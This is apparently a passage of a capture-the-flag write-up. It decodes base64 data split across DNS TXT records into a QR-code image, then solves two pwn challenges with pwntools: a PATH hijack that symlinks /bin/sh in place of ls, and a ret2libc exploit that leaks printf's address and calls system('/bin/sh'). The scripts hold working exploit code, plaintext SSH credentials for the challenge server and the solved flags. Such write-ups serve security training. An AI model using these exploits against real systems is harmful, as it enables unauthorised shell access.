QH1O6S00561HJ67U2YTHXOWK.datastore.challenge-by.ovh.  604800  IN  TXT  "GANF6tnss8vGnshIsw+naMIW6Ko87xco7mcZKFL6B57oA2mUigwU3zFzXxSrRbFH91pBEBcaVD7SS2oi0mlSOCnOHiyZUGqdg/5l0a2z76zgjT/VA2EQSOBTTyrfEvcj"
QHBHJ593C06W744IYE8F8BSN.datastore.challenge-by.ovh.  604800  IN  TXT  "SA6UDLTiKz+jkCMuKpEIyq78gTvRIBjSXqyqD1SWv05KAuh53rTUU+/WoaXcTBwW+bqlZ/IcYjOXkRZXshnpivyAx4FrBdCoRSUBzDpRFg3A7iMAmA2BywM4yQGYqrKv"
QZ6ALG7X70Y83OKBSGSNUBXD.datastore.challenge-by.ovh.  604800  IN  TXT  "AUCjNi3JwFIA3q4FvxyAFWkqp+gD8wDeLADwxYoq/aJjY1qOgWWa8O3AeAwASWkG/lyCgettwhBbROti4LrwY6BYge4HVQqKru+O/9T9o/EeyBR0NwbQHF+j187RGO0Q"
R7OQOSNV6KSUEER0DOOYUFK4.datastore.challenge-by.ovh.  604800  IN  TXT  "iO//hY4Q4+Fb+MNNGIogHezTV/qbA9geX8+jg7UCWAJBnlD9WvhJGWl0PmYpfZEcTAAUy2LrsfboVZxZsIy00ui5HFp+WC+ARitaBwPXh18awDccswM2LbPyACYPvosB"
RAJFSENYIQBHTGM7B36Q208N.datastore.challenge-by.ovh.  604800  IN  TXT  "3Mpo3b6RZ4c3awZwKYJl+sA713gsAK2BlJ4uBtCsSAxUAFiJAVw3A+m9Tx7IQH2d+BmbbA5JZ43b62LgcxUDydoANMiV/5A+MFjvfnqEpb+hEhPBKIHGrQmAZq8RoUQi"
RHPYI1Q4Y57VPUXWKG0S9WL4.datastore.challenge-by.ovh.  604800  IN  TXT  "CHuN79FQjD+4CoIBPPjUcAL4w8Neo+fgMlfIWEFx6bcgeAwGwgTfX52B4aPtBiflApImnKQMpHygnfNMsNOG8lKu4eYRAKRfULRiHwgawa8C4EYhgPl1IkUAPkylv6Qj"
RQ6HV1A7JN641BE3UCC5QY0M.datastore.challenge-by.ovh.  604800  IN  TXT  "PC0iob6IgcEn99Hwkz3aFjHwCX/w01IGvns8BkIzju7dB+rho27mWJPNNjaS5a4TNYDIQMxt/S8YCPHMVXC/PjDsPAb92EYOcFwhDjN6zAcGgZ+z0+PPhvH6lB3Hs7dw"
RQAN5NGY2DGEUYORJISMH2HX.datastore.challenge-by.ovh.  604800  IN  TXT  "eT6jv894H2jOZsczcTnz73hib10c1+NRWPhIc6S5LbOXdmmO3ZrHmcsDPuTxh/hzNPfL94FYd+JtbZC6xxKjaP6TZC6bwyJ5m3TIy/gxjLGCWfBXLLCsx2GMkVYxpLwG"
RVT4M2PVODWROOP4G32L5DTF.datastore.challenge-by.ovh.  604800  IN  TXT  "BQPzPtKYSBc+0uz0fodnopmJs7hsMq8W0mSnW/z03jwISjFQD2aXxkb8Yl35HsQRRtGHA+keyc+lPtIZdZaRSQ7KAIbRPJx+EBrprgzgRAHgdk6hKnykaz3mXzQ6b2Hx"
S3YFPKEOMK4UL1BY02YA4Y3K.datastore.challenge-by.ovh.  604800  IN  TXT  "l59u9ZjCu9XzmInzTgsQNXtM4b0vvJ3ZacNx7kZRsLwPDHDw+GOH3avhdOV7jBrsu+p7o8vkHsm9lvtIlwMQTCu3Ii3ww1DJwMkyBsY+0lBqzftIY02x5WItBJTIUCKD"
S5BKBO19N7V4OCHSYCM12IL6.datastore.challenge-by.ovh.  604800  IN  TXT  "y7B9eW2wX+flYxAPQF0RSmMmeDyT0WmgL2JgQBvvxXlyL7O+0ZXuQXZxA3lQVJK+G98j/pn4SBP0kTbyPtKpJryQgVV/Pp9Pp/U0A60yTZhIPtKJ+RgoFBIf6aScecg+"
SI7KSG4YR0819ADQ2ZU5OKO0.datastore.challenge-by.ovh.  604800  IN  TXT  "ARRlWVUbATS5t/Ne/CLMWW3Odh+Q+kBRE9Fp251T9sGLiHvR37rSPej/v4pyOv1WxD3Msj7SAsBqGET0X9D7L3vn8tW2tYVx16QNzKplYYWZlwktntWhkNxZVBQ7nTWh"
SOGCLQC2DAALDQEGDWM78B7F.datastore.challenge-by.ovh.  604800  IN  TXT  "mHh2DdiUocOrnQF5XDMLNE7wf3u199lb56FzbBkSkuKqXVUtE238Zcvn9Z3f7qzAsUOaVejFamcZnuA3bx8O3g1ercRizJ311rbi40VPZOQLKBZEd+F/364mrmmVIy3x"
SUEUSHO375ZSSNNP8WQVGO1V.datastore.challenge-by.ovh.  604800  IN  TXT  "dzpHOhEQlwzjXxd0Fb9uscrOi464XJAfLljz60vNs8veNPA8RD8Q9iWBRXDwnhF7HIsF5BhUvjUgiy/HqI3BkU4vbVDBEDYXsaeydDmz3uzkZvJqD/FENaWep7qWhke6"
SWLDEWSE06ZAZ41GB1JOL9JO.datastore.challenge-by.ovh.  604800  IN  TXT  "wb+wjSOtORIgIzuJRQszEBcWl8mvsiUzEP62Dzb85of1ftyqxBkYXA7664P+w6NoucWQR47FAko/NmYg/lLxNYqRnLNwpNMTy2kBX8J5+nJ6d/Dh3ZtLEvBU3+aQFjDl"
SYGPWID5L4G1CQ53MIKUZ258.datastore.challenge-by.ovh.  604800  IN  TXT  "TAiGcqQTAfG3P2j55M5iAVXHlNDVYDxH0VGzsR8L+Lfvoa8AJKEYyZkEpBisXYH+QzGScxaOtC0DKxYBS2fNs93BVnvrIF/ysgpod6h6No70mmYq8p60xA9KAXXPXujZ"
T35TRJZ4WGKJ8AF126QSN9M3.datastore.challenge-by.ovh.  604800  IN  TXT  "Gc9gSt1mhYrbHMOXzt1iS8bgDGSPNMNnHRBaK0fa/QiX9Qw8aza2Vrba/V1qNy5GCVgciyMtBSSrLxksu/wdqPmWDQEl49nf36//zB+zuM0xfOmbRAGlnRgFZIsv44/H"
T504Q8BY6IYNAEB6TA6JIRHQ.datastore.challenge-by.ovh.  604800  IN  TXT  "4UhD/7iHezLj4x1WGejNIAhalBzofUvfgd+tYBGuxh8I3jkSJc1fwyBgq7UAABOzSURBVB8MwN42O3388UjwqOtEvu8dP9Na4aEcaUPA2e1AClgzBbRkYCJgXRfQnoEU"
TLY0VH0FGFVDRZVHLS7T0BXC.datastore.challenge-by.ovh.  604800  IN  TXT  "YxwBC04B52V3zumNAQFfQAmkzsqFvmNdTKh2E+ul9O+n+oEZMzDDIyyc81YB69HRz+ojbM9A+QgHYzzCbgGfJwLOOQXMrS33B5czl8/1daRSWsC8YyQygiNtCph4MqkR"
TMPUQCO5WYR6JFY9KWRCSYDA.datastore.challenge-by.ovh.  604800  IN  TXT  "ER/Kl75lG+M5iEQG1qitZVvz8tDvQPZIMz86M0fakYFFm4Dl6cFxLzeYennlDDQ50q5uDH3ClaQbg9+Bh6luTCHpxgDjGbsY3aAeoYBF8mEvO7oxiYqyFY4VohjJ2R7D"
TMYZ3FPYBQWW0STKM18ALOOR.datastore.challenge-by.ovh.  604800  IN  TXT  "7MbMq7gIdwYC4bg/OK4+GC7g/UTAijkSMTnSB1WTIy37gVpHGjMQP3M7xJxUOtJ4v4OE8RxE+/gIY3+dOiTwZXCgd6Q5BvcDySPNMfhsj6EIOAcmK8rAyAfeMJrYIAN9"
TO7RR3UENZXACRB5Q24EHFUX.datastore.challenge-by.ovh.  604800  IN  TXT  "8aIFJeR+KuVx91Sv3/voPSgthiG7s0q5RS9+AWPAKNzM5Up5zEAcS6XHwhaOdIE50nIoV6DBKHqk5VCO2c5wWWxrszGeOQNRkvjGHIPPPBLZ0IZy+L/xjTlGdo407YrZ"
TSTZQ9WL36RHY3IKOGIV2TCP.datastore.challenge-by.ovh.  604800  IN  TXT  "LJeTnQPw6cnrh7X4irnc66geD4z98KIHRUeiIJeb8oU/8CQq5HJ3gZUwm8u9J0wC7fvyZSs8giPdUjjS4tMUaGeuGCLTZIJgO8OfED5bhfEsnur4Lc5AP74V3J9j8JkE"
TZR144LM52DL7XD6QJ9KXX6S.datastore.challenge-by.ovh.  604800  IN  TXT  "5Bg8Fl6p0mSCiGHlSCcxPMPiO69uuDYPcvXSZsOSxtIv05T+faMfyALmTYdqoRGujuJIeziKWMZRZ1fAE8R3oLe8jWznoBEGqs+2tuEdSsYzZ6BX28HRCMfgMwnIMXho"
U69IRQTZKYQE6MPAXNMJQMJ1.datastore.challenge-by.ovh.  604800  IN  TXT  "WVwTrm2KkZytMewZ6BSw6KzmMFrAc2NC1eRIt4kj3ZAcaZzzbOP05WGD5i3F881s5/iyuEmK8RzfDFrhbbqJ6AKJGMmZBOQYJCD8Cl0lhpsjTTf5PXsGFp3VHMYRMDtH"
UDHY7X0SKJQHV2TZP5R8IVVX.datastore.challenge-by.ovh.  604800  IN  TXT  "GqbXida8SquQha52eY8uE+PZp0kfvFkA+2zEXIZ6WTkXqtrNfP4V9Bh1nSPtGzdTONIX18/AOyMfYf+TLyo5Vxejeujd3FHsN/OJgFNJTaO/sIHdWnpEXoVpMCP8p9db"
UK88FWR1CGRK6VWJB6U97XN2.datastore.challenge-by.ovh.  604800  IN  TXT  "W1pGZ8ISOBPW4CdfgP9gsdcLgar6QrgYemVLBt7UJ/L3j25SQNkPLKvFgQo0xLiXKg05py6sezJ1tRdlSyNyYx+pHnlfXsCiun3d7UxQNOvaBbz5DPT8rve1ZOAIAVtf"
UNE19JL7THZ1OLCF6ZWTV0JN.datastore.challenge-by.ovh.  604800  IN  TXT  "p4Be+LVkYHmYgPeyZeAXeIRv9vBhWg8FLLUbTUJqx51yICHEPbfCegMNBvExALQCCzgYXABsgYk9C4BUAF7P+i68aPBy3lHyfe7fVgFlN6aSTBnoE8sX6vw+CWged4w+"
UZXPSXZOVBG2DHMG3J3MP758.datastore.challenge-by.ovh.  604800  IN  TXT  "jQ39dHsFPE2ms2Rh2zEFlJ3CwgQKeHF9AX+caAHR0LxJ2xzSAp6O8QifkIB5Cz/w9gp4ABtlOQOxqXgGjQh2UuJGBFFuT6AkkCIg/hiWkDuFFqW/vp6HFy0QEFuUDUIp"
V05ZCJ6A012GAN22YXD91YZW.datastore.challenge-by.ovh.  604800  IN  TXT  "hBOQgZ7ogPA+Ed6x/o06I/0gVZDl+8SzwC79haQDqVUdnzABu8PWRFICLqjbHDQBr8vS/6cLWBghYJhk4ObwDJw0AUuhCzphlgRSoNKT/QjTJv3nlIE7R39SBt4Ft8Hc"
VCDU7G75L11X3D63OCM7Z0C5.datastore.challenge-by.ovh.  604800  IN  TXT  "9DE2B5tGSaCHRz+RgeE3+M8jmMGqQJNRwLmtnaOD3lm+XDpLMxPMASudRzITslx23cxxDse6meOm5mbDYftE8FC6MXKfiLUjvWlxqCYQjEwcaSBqdMVPa4xnyXamcweH"
VR86OV8J6BGWITEFBJCL6BVG.datastore.challenge-by.ovh.  604800  IN  TXT  "5SZow4jhrwjghr/S8pRYjhgpjrQew0tbfDUBC1kEbI0lYEaONK77EEcaIM5oQyCmS9ARfwvEdnYxnu0xvJp4O5YABeRYjhhZOdKfNQMrqQxEjnRXcKTXkCMtVnDsHGm4"
VWV1XXJYQ69HX47AO50BWEOI.datastore.challenge-by.ovh.  604800  IN  TXT  "BktjsFgJvzYxnpnt7GA8O2L4dLPCTg0FpFiOGLD4WsvCkTY3XLszkISYSy14ZspA/yoc6SL5z2E5XmE8gwCI1aIzMZ55JdkRA33SsJruFVuel8RyxNA40ukYkiPN9rY8"
VXS0J1SI9C60C41MG3P0CAH6.datastore.challenge-by.ovh.  604800  IN  TXT  "CPiYgT7RExKQ8Trxi/0I9SxS+aBSLleFWkJxBuZyr6IIXd7vo1rc+kQRDuUe9b5NZaDGkYbnS9LbGOom1t0Tk1H8o77BeGaimoPxbI+Bbwe6MwFiOWIUx+JIa+4sTLp8"
VYYL5HJOVJ3QE6VZIKOC278L.datastore.challenge-by.ovh.  604800  IN  TXT  "MoeauO9Lyh5rWcdQtE1PqTb9ZglpxPlkQlWpK5eVIy2WsyU/sJNi+zHTz854dsSweqTjWI4YqGVmjrTmzvKM/YXanIuXjOs0Yvz3Gab0r06wNOiSTJV0MJ4dMUyPNMey"
W16HRRVN326EDZMT821OL5JT.datastore.challenge-by.ovh.  604800  IN  TXT  "xxiTI30VAX/MJuCJloHjc6RBRYNvyg7VwM54dsTw7B5pRwyLH9vGkbYaLD9nBo7AIFspvp2uwXhmj7SDsOuIYTeZbztiWPzYbopvOdXneP7pMvBca4VHYJCtHOmOyXh2"
W4BWDK42OZ1NKIHPONXZUKBH.datastore.challenge-by.ovh.  604800  IN  TXT  "ZeAoAT3PYjJ3xBiHI13qQvPqR8ExlNQ7zk15Xp0OqKNY/r0umuT9I9QITGz11fg1ba7CVjgP5ee+wy8CxOfyhGoUhdfPQJPxzB5pB2X8Shk4nCM9nGRekkvB3yTAEnFI"
W7GVPICTTFBXP5P8KB7NRBPV.datastore.challenge-by.ovh.  604800  IN  TXT  "b4zWD9QAybK+8IK689BeT+QqHOm24zvQczCeHTGGfgdeiyOtC3hq7nBNBJQjkRPcujmugF+8Fe6O3QofjGqFfVXAIJWBbgHHz0ALR/qgqgno5kiP0Q/0jX7ggdkP9LR+"
W7MXMQVDL53G123LTJB0RDPH.datastore.challenge-by.ovh.  604800  IN  TXT  "YBzLEQP17XS9kRzp9COsfPS86xFWABUnNgHzrppKV+BIb6QYz0NHIq4Y6NFURyIUyxEjM0caBSz0m13KwOXOLjgTPCwJVC5XOp3BYNBpXMA60mBwGf9YA6Y42vHRiYd/"
W8NQ2TLM5NZ7I09ZD3NEZOIR.datastore.challenge-by.ovh.  604800  IN  TXT  "nU4T3v6tXP7Q3sDZVXQoNNor63g0q9p3oORIh5QN2TjSXY3xDJ8CbsRng/HsiAEZWZQeaY5VG8KR3snAkb5HBSDPVY70edJZ4RIiL+0rxsqaiNaN6TrqiUiOdGssjvSO"
WERWGI0U081SHK9SLU37LXRZ.datastore.challenge-by.ovh.  604800  IN  TXT  "xnhmtrOD8eyIwbMxbPGlWI4YmTnSLOAzykDaaMOz+PO0sC7XRMwVY4eAc6kpfZMjTbObfHkoR7q9RKboNk0qih3hdsazI4a3Im7GAnIsR4xagycXh3OkpYCFKwi4MFLA"
WHXUECWZQIN0D1OP6OB72BNS.datastore.challenge-by.ovh.  604800  IN  TXT  "89SMtF7ZMMWRJq+0yZEmZ7LIjoAu81nsgkgYz44YfDN6kM0pZyMGv+2IYc/AE9sjLOtQSQCjloGlYY/wSdIKj1iv+BRrIiOWLxyxXGsiw2PINRElA2fA37a2tLQrzAjr"
WOCNBDS96D7AH4BC9889PUF9.datastore.challenge-by.ovh.  604800  IN  TXT  "5fJis58HmZ5AixA3FW+E/60vBfyVjG99uMzojj54FU4nYllTE5B9Lg90mI5WHreszlUvUAcyfcx/ZnbWP0JAf4SAZDuyCvjDZ2dnfXUCBqqAlWwCLowUcBIyMNRLAt3P"
WRFYBHQU2CW09EQCELZU7KZ9.datastore.challenge-by.ovh.  604800  IN  TXT  "koHeqAycn5QMLPb7OBKpArCtuR7/88wh4BJstOn13tEWnCqwdt6qApZolw02HpW9hxfXrLH+Dz5sjzCDe2eN2VVPHQvjoUGlJ8ZcZAiYzkDfEPC+U0AN6XsyoQJWRgp4"
WRHMWPHQJU36BSPOCGLEUPII.datastore.challenge-by.ovh.  604800  IN  TXT  "998MdB+blgzkR3huZAY+/jcD/+y9gdWMWEDc9z+DL45zU2CE48Lxr6j6YghrIlhJegHrBKGAdEWxt91qAX9l+N7xxySroMBSLOAPfnzMlrHaUngP5Kx4IR5PgX6ez8Ez"
WU3V275DL6LQFNCDNGPNZPAL.datastore.challenge-by.ovh.  604800  IN  TXT  "Ci99MbOQW0QBq3DpuU7tuMX5pjxx/5OP5UkCYFTsqumm4iQ1NfOYZhY+Qz2Rr/LQN36cjxKwYnzTnQ8RsDIRAl7YuLFidrU8JAPvjRTwYjIycFYWh1MKc/nTx+e+n8+z"
WWM599T7BG6163SV3JUNNUIN.datastore.challenge-by.ovh.  604800  IN  TXT  "gK/hiw4rPyzgRJgPMpWAxnMO35KJgKVEwDD8r2pvu73fgTDX/De1qH/lFXL049z0fhSSgKjwFJSMni3lz6FJzlOVPnznDgnIrXDXmyvlqzp4h6kdRLsgRsaqYGPwZWZj"
X1PMPUWL5H6P7OBU1QYPFWOK.datastore.challenge-by.ovh.  604800  IN  TXT  "MHBjj2aJ98RMbp0v001W+U+JeWyD9RHoMeS5qsUIiNpBPBGOwefhMdBZKvvET8vSY/QLoeBl1VHuB/JKZlUdlpyq/cCu2B+hubMEN+awIczFh8TjbggMy6HgxviHYsEh"
X9FVLBP0AVQN7ZX8X15564YY.datastore.challenge-by.ovh.  604800  IN  TXT  "aHdwcXG1Iab6VwURPb6M8+s1wskEbWJlC6ZLoSNQL3XxbnwZp985RnIWu9g4RtAWpO34JlUlhjwPi4GUysVQ5uOpJEn/kqylawIqC+vDBJwjAeVIRFBjOyEytGvbuGLr"
XBMCB0LPX1JGJPTTORZHUQQ6.datastore.challenge-by.ovh.  604800  IN  TXT  "rVQFuWhLkItqD8WCxOG2gA4BuQje3hEri4fb/vK2MBahoWBrD1d2VnfE8lt8MwQbbe3hh6vteIjWphh8DrYOW/9v71ye2yiCOIxFUejoLY1W9k2lVEh8w9h5cGNjI3Ek"
XC0Y93AQH5GCWOO9PMIPZNIL.datastore.challenge-by.ovh.  604800  IN  TXT  "JVvkiLCt5Iji5xFcUDG32JAq579le7p7XjszKynyQqRsUjXRSrsd/dQ7z56vLRvnUsDGgYyoZhvKVtyGdCgzzuqZbhWeqbX0kIDDCQTUHohLuoS96iGIu2Gws0DRnmZn"
XD3TMC8T70KYX7TPEKIYD4OF.datastore.challenge-by.ovh.  604800  IN  TXT  "wRo4rGhLdnYm0U+wystXAD5WjDXXapDJpVwZBD3GqAFgZw30FVy2xunQsJGcKHYWrAuzDVVGbSR6CSlReq6UCnhd8MAHpoCrtGXR54GgUqrpbd0hRguAbDoqC2FMIwKv"
XDOFWUHIDDBZT8S40ZIGA6YP.datastore.challenge-by.ovh.  604800  IN  TXT  "aXqbCXUzwGBy9RzAa4e8gokC9tEe2+CSF9bJhkNvYxsa7hazkTA7QkDen78y7r5cEAzh6uoNzPpd0RQgzwfW4czn59uvrv4kTs+mJN7p+UAJ68n/m8fHmWqFFYjb4AfC"
XEJXW1H0B81VCM33ZLJUG9UM.datastore.challenge-by.ovh.  604800  IN  TXT  "zw5xVg6Im9l+EC0gF9wNfqAVt6w50rnWkrSt41akxEBxRBuqDPADGcQ91LKbHGm/DUFJ6pOveRo+95kVvYhJkQmdAoUHRyBWT/nSw4wyDyO4aGKCpQZxy0cY45aLBEsC"
XGCZQD03CO87T8MZ78JG6W6O.datastore.challenge-by.ovh.  604800  IN  TXT  "Rss7arrkbARLsqHKuA0UMONpl/bYJ2Ag3ndqAXVon4LQJgGOtGS1fY8gbgNCG2Codi2+6ab6uuRnHI/kxAeSjWQyhmrARos8sKlGFXco4BQYZCd+ObEwyGUUX/5yJRhk"
XKOKPPQWSZNON3O57OZ3KN5K.datastore.challenge-by.ovh.  604800  IN  TXT  "HQ1rUHwZg7ypykkovmbWUVfAr4KP8IojYC0uoJgBxO3lSJ+WcaQLAibJtCDu06EqJxFw7BGwjdFp+/nFj6C86bTfvXsLQWxPtQeeHo0oTKH5/v3+/gu5YWw0oGM/t+WG"
XZWZ42TLV1Y06EQR04EJZ9LD.datastore.challenge-by.ovh.  604800  IN  TXT  "t83sgWnBA4Mk86k90APi9ntgOoUHbngGfNhzSbUHJir08jtVEdy33M6/zaFfVgfOwtLfc+OX74Clv+eNkfZ64MOggE1zHjA1McjrLnu72A+cJptD/uWmzeZgfTluRGLZ"
Y64FKOK9TRPMBFA41QD64DH1.datastore.challenge-by.ovh.  604800  IN  TXT  "HDTJ/EOyOWQzCbgymYD2SEQoN5wln0gRxK37aN1Crg/eKxfqxvjziRRB3DEbIuiBG1N4IIe3Ncs9UAZ74iDCBHELB8SdxjLaZLIfhnK31PaY/E4wHjQ6uRgjHQRxp05G"
Y8ZIHNTNQLRH4OYNK4RX69M2.datastore.challenge-by.ovh.  604800  IN  TXT  "mz46JNvgMm4DM9r4PLA9ItgvpZ27IdaOrAO/gKbjpwPYUSsbkdEIYqRHr4Dn9jcMy7e2Hm87HoitsJQNIxVxKBfLqYRPIQ5Q1FBO5qnatHIqcb4jB5ItxSIp4MquL6dS"
Y9CZNRSNLMUZFO3YS5ILX73U.datastore.challenge-by.ovh.  604800  IN  TXT  "klg5lcbKBpdxGwn5jrcbs2LOO2tkYJMGz+tqsqbl9FxW/XvlGMQtMMRTgbhJDmGAuMHHZPquPu9+VVm9TMk5zja/g0pjZUCyjRxStCmYfiQpINtgAXPfEsZNjJvFbDge"
YDE8IEDDX8HNNVMOGHCC6W3M.datastore.challenge-by.ovh.  604800  IN  TXT  "aHWkf3cEzFwBO5maEeuYMeir/t2aOHQ4wgRyajvIS0wcNzg5o1k5edNuH5O6HVECOfbalz1Eam/TTXCmJO1jzrdHmPNNsbP7PTqNN+GSBCQbzJFuDE5kMDTZUGXcRmLV"
YF5T75Y3GME12D83EG8OCTW4.datastore.challenge-by.ovh.  604800  IN  TXT  "ge1sCgHXlAdGBbx2JlR3MH8gC9ijbIPH+/3MENBNYZg0h3T6CZ3GmxAkm7IOto728dMIyebUhWyDS6oV2AYJqFIXkg0u4zZsD7zHkwm/+ASkRzgtPMIi9ghrD+TcmplV"
YFRKOAQCZYZTVMZF9S6YRJIY.datastore.challenge-by.ovh.  604800  IN  TXT  "hnJrOqcJLFs4Ta9P7Ks4HSa93HVK52bJRLk1Azao/cQc1no66/ZWgnfOgcJTh/dqwNr5tVgHwkoKsHZu8yNvY2Qygh/gijdiV86SLXxkwpqqyqwJVbdheG2TTvgRTtu4"
YH6HVYVEK5CT6SZD95BKDA8M.datastore.challenge-by.ovh.  604800  IN  TXT  "mCevaeAKU0063Xq75oyFF1fAsd3fu55MQOmB1riuYYYdrRVmYxZUwFXbA3lRKSxgWiogg/WXQ8A1K6XwBS9rugJ+43mEc6nDHrhEAna2d/n4lptPEhCBbRDDdgGLHOiB"
YP6BY383KWYIV6N8HXP3YKA6.datastore.challenge-by.ovh.  604800  IN  TXT  "dVwsb9br0gMfwmdktdeo521Nfs0fsP6+VpgPXNxHuFZrd/Cv3o/Z0rH4P0PD8JxmTHl67/bqmsbC3NF7AQtQr2EsvK5yCS1JKxwILuo4CSAvTQEv1WSCDi56AEuhGzrw"
YUMBYF7QFA4USSX2W2510G0M.datastore.challenge-by.ovh.  604800  IN  TXT  "bbgUKHhXwOcFAXm7Ry0u4I1fwOslaIU7/gBL1wNr5jrHpZoP1B54bzk90EzmXv+HT8u457r8549Qo8EjDKXyQOwuN9o1ruTefvYlRHTdV7eE6KzfagvvgXd7iMVvhSs7"
Z70HSQZ59FPFYR7HLWPACBN6.datastore.challenge-by.ovh.  604800  IN  TXT  "Pgn4ScBPAn7UtSFzpEtwB1nifV3CeJ6ODO18ejYb1WZuSjwcaZzv7doc6TMCbTT8HOkdPO1SO1ohjrRlQzxmTAd2xs78HOkdxZHejthQHOnqBERATIgj/USuOPQm5kj3"
Z7YF4SV1T4K24PFPD053XOLD.datastore.challenge-by.ovh.  604800  IN  TXT  "zbcV41mGWIvJONK9Mo708WActKE50hV7oGI8DyGdaiK2dqUSO8SRPivhSI/9HOlNpAqNHI60bUMlLD7sSgHPAhzpsZ8jbdvQHOnq6sAJONKSZyUjGPwc6STKkW6VcKT3"
ZDTP78AW9BNP6NGL0FTCN4ID.datastore.challenge-by.ovh.  604800  IN  TXT  "LI402wrYCHCkWwWOdMUe+B9zpI3IhHlxpKsTcG4caUEx0qICjrQo5UhX64EfQLBs2ARLMUqMKK05caQbfo60iHGkq/XA2TjSqc03pRjpTMyTI536GaqilCNdrQfOkSM9"
ZKD9A294AJOE4LGC4F0EDCLY.datastore.challenge-by.ovh.  604800  IN  TXT  "X4pvnCMdo/hW2wovIEf6I/BAP0d6viTzOEf6/yHgwS79xK0BitTlDVmiQSG+roDIo7Tqp0xVpBmXCcbrCtrD4beBsZ3yMyI9FFpAvw10UI7HLtiAvv+eX0AR+BN+J/6u"
ZY6EBR899O7GMHT46DF616DM.datastore.challenge-by.ovh.  604800  IN  TXT  "uu+/Jsi6bjb0G58AAAAASUVORK5CYII="

Write some code to read base64 data

s = open("datastore").read()
b64 = ""
while s!="":
	f1 = s.find('"')
	s = s[f1+1:]
	f2 = s.find('"')
	b64 += s[:f2]
	#print b64
	s = s[f2+1:]

ret = b64.replace("Let's begin.","").replace("OMG ! You're on the way to find out my secret... NOOOOOOOO !!!!","")

file = open("result","w").write(ret.decode("base64"))

read it and we get an image.

Flag is in QR code
INSA-3c6e652a93e69f0aad2a329b67b7a034

3. LSEASY (Pwn)
That is an easy-change-PATH challenge

from pwn import *
import random

_ssh = ssh(host="pwn1.ctf.insecurity-insa.fr",user="user138",password="dL2NXV9XDBbvmp86btnX")

_dir = random.randint(0,100000)
_dir = "/tmp/"+str(_dir) + "/"

_ssh.process(["mkdir",_dir])
_ssh.process(["ln","-s","/bin/cat",_dir])
_ssh.process(["ln","-s","/bin/sh",_dir+"ls"])

sh = _ssh.process('/bin/sh')
sh.sendline("export PATH="+_dir)
sh.sendline("./vuln")

sh.interactive()


#cat flag
#INSA{SySt3m_1s_3v1l_-}

4. CRAZY (Pwn)
That is an basic leak libc challenge

from pwn import *

file_server = "./../level2/vuln"
file_local = "./crazy-minitel"
buff = 268

libc = ELF("./libc.so.6")
elf = ELF(file_local)

mov_printf = 0x08048479
got_printf = elf.got["printf"]

_ssh = ssh(host="pwn1.ctf.insecurity-insa.fr",user="user138",password="dL2NXV9XDBbvmp86btnX")

l = _ssh.process([file_server,"a"*buff+p32(mov_printf)+"1234"+p32(got_printf)])
print l.recvuntil("Input:")
print l.recvuntil("a"*buff)
print l.recv(4).encode("hex")
print l.recvuntil("Input:")
printf = u32(l.recv(4))

libc.address= printf - libc.symbols["printf"]
system = libc.symbols["system"]
binsh = next(libc.search("/bin/sh"))

print "system: ",hex(system)
print "bin/sh: ",hex(binsh)

p = _ssh.process([file_server,"a"*buff+p32(system)+p32(binsh)+p32(binsh)])
p.interactive()